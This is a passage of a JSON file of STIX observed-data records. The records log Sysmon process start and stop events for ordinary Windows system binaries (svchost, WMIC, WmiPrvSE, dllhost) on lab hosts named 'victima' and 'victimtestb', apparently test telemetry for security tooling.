| "entity_id": "{ca21cdf6-4f12-62e1-6102-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:43:30.914Z", | |
| "last_observed": "2022-07-27T14:43:30.914Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--fd3f5908-6137-4e79-80b0-2cfaff2d01d1", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.941Z", | |
| "modified": "2022-07-28T16:05:22.941Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "WMIC.exe", | |
| "pid": 5380, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T14:43:39.299554325Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:43:32.954Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4f12-62e1-6102-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "WMIC.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\wbem" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:43:31.337Z", | |
| "last_observed": "2022-07-27T14:43:31.337Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--0d4f21ea-a8f5-49cd-a1ea-76fd5745d019", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.942Z", | |
| "modified": "2022-07-28T16:05:22.942Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "svchost.exe", | |
| "pid": 3868, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T17:22:14.394915600Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T17:22:08.049Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-7389-62e1-af02-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T17:22:06.382Z", | |
| "last_observed": "2022-07-27T17:22:06.382Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--3b75bdfd-ebf9-42a7-a15e-0a7dc3840e1c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.942Z", | |
| "modified": "2022-07-28T16:05:22.942Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "wusvcs", | |
| "-p", | |
| "-s", | |
| "WaaSMedicSvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-8c92-62e1-4603-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "pid": 680 | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "svchost.exe", | |
| "pid": 3868, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\svchost.exe -k wusvcs -p -s WaaSMedicSvc", | |
| "creator_user_ref": "11" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "6", | |
| "ingested": "2022-07-27T19:06:02.396604032Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T19:05:56.061Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "11" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "6": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "7", | |
| "8" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "9" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "7": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "8": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "9": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "10": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "11": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "wusvcs", | |
| "-p", | |
| "-s", | |
| "WaaSMedicSvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-8c92-62e1-4603-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T19:05:54.941Z", | |
| "last_observed": "2022-07-27T19:05:54.941Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--4b575f8e-ccbe-4e69-9151-9b36dcf919f8", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.942Z", | |
| "modified": "2022-07-28T16:05:22.942Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "svchost.exe", | |
| "pid": 3868, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T19:07:01.971962790Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T19:06:55.618Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-8c92-62e1-4603-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "9": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "10": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T19:06:55.067Z", | |
| "last_observed": "2022-07-27T19:06:55.067Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--bfc8cab0-1110-4856-ba87-e93aac5f6d9c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.943Z", | |
| "modified": "2022-07-28T16:05:22.943Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\wbem\\wmiprvse.exe", | |
| "-secured", | |
| "-Embedding" | |
| ], | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "WMI Provider Host", | |
| "pe_original_file_name": "Wmiprvse.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-8f26-62e1-4903-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "pid": 836 | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "WmiPrvSE.exe", | |
| "pid": 8872, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", | |
| "creator_user_ref": "11" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "6", | |
| "ingested": "2022-07-27T19:17:02.160338656Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T19:16:55.824Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "11" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "WmiPrvSE.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32\\wbem" | |
| }, | |
| "6": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "7", | |
| "8" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "9" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "7": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "8": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "9": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "10": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "11": { | |
| "type": "user-account", | |
| "user_id": "NETWORK SERVICE", | |
| "account_login": "NETWORK SERVICE" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\wbem\\wmiprvse.exe", | |
| "-secured", | |
| "-Embedding" | |
| ], | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "WMI Provider Host", | |
| "pe_original_file_name": "Wmiprvse.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 3, | |
| "entity_id": "{ca21cdf6-8f26-62e1-4903-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T19:16:54.452Z", | |
| "last_observed": "2022-07-27T19:16:54.452Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--cf280168-a8cc-4119-acec-4ac9a1326cb5", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--544b5051-db84-4208-9b22-09304ec21acc", | |
| "created": "2022-07-28T16:05:22.943Z", | |
| "modified": "2022-07-28T16:05:22.943Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "netsvcs", | |
| "-p", | |
| "-s", | |
| "wlidsvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-7389-62e1-af02-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "pid": 680 | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "svchost.exe", | |
| "pid": 3868, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wlidsvc", | |
| "creator_user_ref": "11" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "6", | |
| "ingested": "2022-07-27T17:19:13.616329058Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T17:19:07.286Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "11" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "6": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "7", | |
| "8" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "9" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "7": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "8": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "9": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "10": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "11": { | |
| "type": "user-account", | |
| "user_id": "SYSTEM", | |
| "account_login": "SYSTEM" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\svchost.exe", | |
| "-k", | |
| "netsvcs", | |
| "-p", | |
| "-s", | |
| "wlidsvc" | |
| ], | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-7389-62e1-af02-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T17:19:05.928Z", | |
| "last_observed": "2022-07-27T17:19:05.928Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "name": "elastic_ecs", | |
| "type": "identity" | |
| }, | |
| { | |
| "id": "observed-data--bbb01b13-177b-4558-b55b-e2eb431bed1c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.759Z", | |
| "modified": "2022-07-28T16:05:45.759Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\System32\\svchost.exe", | |
| "-k", | |
| "LocalServiceNetworkRestricted", | |
| "-s", | |
| "RmSvc" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\system32\\services.exe" | |
| ], | |
| "parent_args_count": 1, | |
| "parent_entity_id": "{ca21cdf6-a1de-62e0-0b00-000000001300}", | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-a1f2-62e0-7400-000000001300}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "services.exe", | |
| "pid": 680, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\services.exe" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "svchost.exe", | |
| "pid": 4316, | |
| "binary_ref": "6", | |
| "command_line": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T02:27:04.360787613Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T02:26:56.235Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "services.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "svchost.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victimtestb", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victimtestb", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "NT AUTHORITY", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "LOCAL SERVICE", | |
| "account_login": "LOCAL SERVICE" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\System32\\svchost.exe", | |
| "-k", | |
| "LocalServiceNetworkRestricted", | |
| "-s", | |
| "RmSvc" | |
| ], | |
| "parent_args": [ | |
| "C:\\Windows\\system32\\services.exe" | |
| ], | |
| "parent_args_count": 1, | |
| "parent_entity_id": "{ca21cdf6-a1de-62e0-0b00-000000001300}", | |
| "pe_file_version": "10.0.19041.1806 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "Host Process for Windows Services", | |
| "pe_original_file_name": "svchost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-a1f2-62e0-7400-000000001300}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T02:24:50.309Z", | |
| "last_observed": "2022-07-27T02:24:50.309Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--68cd3662-c901-4bbe-9ef1-f813c7be6eae", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.759Z", | |
| "modified": "2022-07-28T16:05:45.759Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\DllHost.exe", | |
| "/Processid:{338B40F9-9D68-4B53-A793-6B9AA0C5F63B}" | |
| ], | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "COM Surrogate", | |
| "pe_original_file_name": "dllhost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 2, | |
| "entity_id": "{ca21cdf6-a2d2-62e0-9c00-000000001300}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "pid": 844 | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "dllhost.exe", | |
| "pid": 3124, | |
| "binary_ref": "4", | |
| "command_line": "C:\\Windows\\system32\\DllHost.exe /Processid:{338B40F9-9D68-4B53-A793-6B9AA0C5F63B}", | |
| "creator_user_ref": "11" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "6", | |
| "ingested": "2022-07-27T02:28:43.618340906Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T02:28:36.854Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "11" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "dllhost.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "6": { | |
| "type": "x-oca-asset", | |
| "hostname": "victimtestb", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "7", | |
| "8" | |
| ], | |
| "name": "victimtestb", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "9" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "7": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "8": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "9": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "10": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMTESTB", | |
| "id": "S-1-5-18" | |
| }, | |
| "11": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Windows\\system32\\DllHost.exe", | |
| "/Processid:{338B40F9-9D68-4B53-A793-6B9AA0C5F63B}" | |
| ], | |
| "pe_file_version": "10.0.19041.546 (WinBuild.160101.0800)", | |
| "pe_product": "Microsoft\u00ae Windows\u00ae Operating System", | |
| "pe_description": "COM Surrogate", | |
| "pe_original_file_name": "dllhost.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Windows\\system32\\", | |
| "args_count": 2, | |
| "entity_id": "{ca21cdf6-a2d2-62e0-9c00-000000001300}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T02:28:34.500Z", | |
| "last_observed": "2022-07-27T02:28:34.500Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--0c7733dd-056e-42f6-b5bb-df555492074c", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.760Z", | |
| "modified": "2022-07-28T16:05:45.760Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "dllhost.exe", | |
| "pid": 3124, | |
| "binary_ref": "3", | |
| "creator_user_ref": "10" | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "5", | |
| "ingested": "2022-07-27T02:28:47.503044259Z", | |
| "code": "5", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T02:28:40.784Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process terminated (rule: ProcessTerminate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "end" | |
| ], | |
| "user_ref": "10" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-a2d2-62e0-9c00-000000001300}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "dllhost.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Windows\\System32" | |
| }, | |
| "5": { | |
| "type": "x-oca-asset", | |
| "hostname": "victimtestb", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "6", | |
| "7" | |
| ], | |
| "name": "victimtestb", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "8" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "7": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "8": { | |
